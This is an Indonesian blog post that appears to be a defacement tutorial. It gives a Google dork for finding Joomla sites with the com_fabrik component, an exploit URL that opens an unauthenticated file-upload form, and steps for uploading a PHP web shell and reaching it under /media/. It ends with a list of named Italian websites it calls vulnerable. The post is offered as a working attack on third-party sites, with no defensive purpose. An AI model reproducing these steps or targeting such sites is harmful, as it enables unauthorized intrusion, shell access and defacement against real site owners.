Masih membahas tentang deface. Cara ini cukup mudah karena hanya mengupload file. Oke langsungg aja cekidot kawan :D
1. Ketik dork berikut ke google : inurl:index.php?option=com_fabrik
*Jika ingin suatu target bisa menambahkan site:com
Contoh : inurl:index.php?option=com_fabrik site:com
2. Akan ada banyak web, anda buka terserah yang mana
3. Masukkan exploit ini : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini
6. Jika berhasil, buka shell anda dengan format www.site.com/media/namashell.php
7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.
#WEB YANG VULN
http://www.albertobertoli.it/
http://www.odcecperugia.it/
http://aiptp.it/media/
http://
http://www.lsedil.it/
http://www.triathlonteam.it/
http://www.authon.it/
http://www.hoursinmotion.it/
http://www.ready4english.it/
http://
http://lnpsrl.it/
http://
Posting Komentar